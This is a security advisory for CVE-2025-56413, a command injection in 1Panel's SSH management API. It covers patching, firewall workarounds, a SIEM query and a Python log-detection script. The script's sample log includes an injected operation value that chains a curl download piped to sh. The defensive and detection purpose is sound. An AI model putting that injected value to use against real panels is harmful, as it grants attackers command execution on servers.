CVE-2025-56413
📋 TL;DR
This CVE describes an OS command injection vulnerability in the SSH operation function of 1Panel. A user who is already authenticated to the panel can send a specially crafted request to the vulnerable SSH management API endpoint and execute arbitrary commands on the underlying host. Every instance running the affected 1Panel version is at risk.
💻 Affected Systems
- 1Panel 2.0.8 (fixed in 2.0.9; see Fix & Mitigation)
📦 What is this software?
1Panel, an open-source web-based Linux server management panel by FIT2CLOUD (https://github.com/1Panel-dev/1Panel).
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise: an attacker executes arbitrary commands with the privileges of the 1Panel process, which on a typical installation is root, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.
Likely Case
Unauthorized command execution leading to data exfiltration, lateral movement within the network, or service disruption.
If Mitigated
Limited blast radius if network segmentation and least privilege are in place, but the vulnerability still turns any compromised or malicious 1Panel account into OS command execution on the host, so it cannot be treated as contained by those controls alone.
🎯 Exploit Status
Exploitation requires an authenticated session on the 1Panel interface; the flaw is not reachable by an unauthenticated attacker. The vulnerable code is the core SSH management function exposed through the /api/v2/hosts/ssh/operate endpoint (see Detection & Monitoring), so any account that can call that endpoint, including one obtained by credential stuffing or phishing, can exploit it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.0.9 or later
Vendor Advisory: https://github.com/1Panel-dev/1Panel
Restart Required: Yes
Instructions:
1. Back up your 1Panel configuration and data.
2. Update 1Panel to version 2.0.9 or later using the built-in update mechanism or a manual installation.
3. Restart the 1Panel service.
4. Verify the update was successful (see How to Verify).
🔧 Temporary Workarounds
Disable SSH Operations
Temporarily disable the SSH operation functionality in 1Panel to prevent exploitation. This page does not name a specific configuration key for doing so; check the 1Panel documentation for your installed version.
# Modify the 1Panel configuration to disable SSH operations
# Check the 1Panel documentation for the option that applies to your version
Network Access Control
Restrict access to the 1Panel API endpoint to trusted IP addresses only. This reduces who can reach the panel; it does not protect against a malicious or compromised account connecting from a trusted address.
# Example using iptables. PANEL_PORT is the port 1Panel listens on,
# TRUSTED_IP a management host or CIDR (e.g. 192.0.2.0/24); both must be set.
PANEL_PORT="${PANEL_PORT:?set to the port 1Panel listens on}"
TRUSTED_IP="${TRUSTED_IP:?set to a trusted IP address or CIDR}"
# Insert at the top of INPUT so an existing broad ACCEPT rule cannot shadow these;
# the DROP goes in first so the ACCEPT ends up above it.
iptables -I INPUT 1 -p tcp --dport "$PANEL_PORT" -j DROP
iptables -I INPUT 1 -p tcp --dport "$PANEL_PORT" -s "$TRUSTED_IP" -j ACCEPT
# Rules do not survive a reboot unless saved (e.g. iptables-save) by your distribution's mechanism.
🧯 If You Can't Patch
- Implement strict network segmentation to isolate 1panel instances from critical systems
- Limit who holds 1Panel accounts, enforce strong unique credentials on them, and monitor for suspicious activity, since any valid account can reach the vulnerable function
🔍 How to Verify
Check if Vulnerable:
Check whether the installed 1Panel version is 2.0.8 (or any release earlier than the 2.0.9 fix) by looking at the web interface or the installation directory.
Check Version:
docker exec 1panel cat /opt/1panel/version || cat /opt/1panel/version
Verify Fix Applied:
Verify the version has been updated to 2.0.9 or later in the 1panel web interface or via version check command.
📡 Detection & Monitoring
Log Indicators:
- Unusual SSH operation requests in 1panel logs
- Suspicious command execution patterns in system logs
- Multiple failed authentication attempts followed by SSH operations
Network Indicators:
- Unusual outbound connections from 1panel server
- Traffic to the /api/v2/hosts/ssh/operate endpoint with suspicious parameters
SIEM Query:
(source="1panel" AND uri_path="/api/v2/hosts/ssh/operate") OR ((process="bash" OR process="sh") AND parent_process="1panel")
Note: the parentheses matter; without them the AND binds tighter than the OR and the query silently changes meaning. Matching every value of the operation parameter (operation="*") adds nothing, so the first clause matches all calls to the endpoint and the analyst filters by operation value afterwards.
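The SIEM query above only selects events; the indicators listed under Log Indicators (unusual operation values and failed logins followed by SSH operations) still need a decision rule. The script below is an added illustration, not code from this page or from the 1Panel project, of that rule run over constructed sample log lines. The one-JSON-object-per-line log format, the /api/v2/auth/login path, the 10-minute window and the allowlist of legitimate operation values are all assumptions; only the /api/v2/hosts/ssh/operate path comes from the page.

```python
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

SSH_OPERATE_PATH = "/api/v2/hosts/ssh/operate"   # endpoint named on this page
LOGIN_PATH = "/api/v2/auth/login"                # assumed login endpoint path
# Assumed allowlist of legitimate values for the "operation" field.
KNOWN_OPERATIONS = {"start", "stop", "restart", "enable", "disable"}
# Characters that let a value break out of a shell command context.
SHELL_METACHARS = re.compile(r"[;&|`$<>\n\r\\]")
FAILED_LOGIN_THRESHOLD = 3
FAILED_LOGIN_WINDOW = timedelta(minutes=10)

# Constructed sample entries (NOT real 1Panel logs): three failed logins from one
# address, a successful login, then an SSH operate call carrying an injected command,
# followed by a benign restart from a different operator.
SAMPLE_LOG = """
{"ts":"2025-09-01T10:00:01Z","ip":"203.0.113.7","user":"-","method":"POST","path":"/api/v2/auth/login","status":401,"body":{}}
{"ts":"2025-09-01T10:00:03Z","ip":"203.0.113.7","user":"-","method":"POST","path":"/api/v2/auth/login","status":401,"body":{}}
{"ts":"2025-09-01T10:00:05Z","ip":"203.0.113.7","user":"-","method":"POST","path":"/api/v2/auth/login","status":401,"body":{}}
{"ts":"2025-09-01T10:00:09Z","ip":"203.0.113.7","user":"admin","method":"POST","path":"/api/v2/auth/login","status":200,"body":{}}
{"ts":"2025-09-01T10:00:12Z","ip":"203.0.113.7","user":"admin","method":"POST","path":"/api/v2/hosts/ssh/operate","status":200,"body":{"operation":"restart; curl http://198.51.100.9/x | sh"}}
{"ts":"2025-09-01T11:30:00Z","ip":"192.0.2.10","user":"ops","method":"POST","path":"/api/v2/hosts/ssh/operate","status":200,"body":{"operation":"restart"}}
"""


def parse_ts(value):
    """Parse an RFC 3339 timestamp; the Z suffix is rewritten for older Pythons."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def suspicious_operation(value):
    """Return the reasons an 'operation' value looks like injection (empty if benign)."""
    reasons = []
    if value not in KNOWN_OPERATIONS:
        reasons.append("operation_not_in_allowlist")
    if SHELL_METACHARS.search(value):
        reasons.append("shell_metacharacters")
    return reasons


def parse_log(text):
    """Yield one dict per non-empty line of the assumed JSON-lines log."""
    for line in text.strip().splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def detect(text):
    """Walk the log in order and raise one alert per suspicious SSH operate call."""
    alerts = []
    failures = defaultdict(deque)  # client ip -> timestamps of failed logins
    for entry in parse_log(text):
        ts = parse_ts(entry["ts"])
        ip = entry["ip"]
        if entry["path"] == LOGIN_PATH and entry["status"] == 401:
            failures[ip].append(ts)
            continue
        if entry["path"] != SSH_OPERATE_PATH:
            continue
        operation = str((entry.get("body") or {}).get("operation", ""))
        reasons = suspicious_operation(operation)
        # Drop failed logins that fall outside the correlation window.
        recent = failures[ip]
        while recent and ts - recent[0] > FAILED_LOGIN_WINDOW:
            recent.popleft()
        if len(recent) >= FAILED_LOGIN_THRESHOLD:
            reasons.append("preceded_by_failed_logins")
        if reasons:
            alerts.append({"ts": entry["ts"], "ip": ip, "user": entry["user"],
                           "operation": operation, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(json.dumps(alert))
```

Run against the sample, the benign restart from 192.0.2.10 produces nothing, while the call from 203.0.113.7 is flagged on all three rules. The allowlist check is the one that still fires when an attacker avoids metacharacters, so keep it even if the other two look redundant.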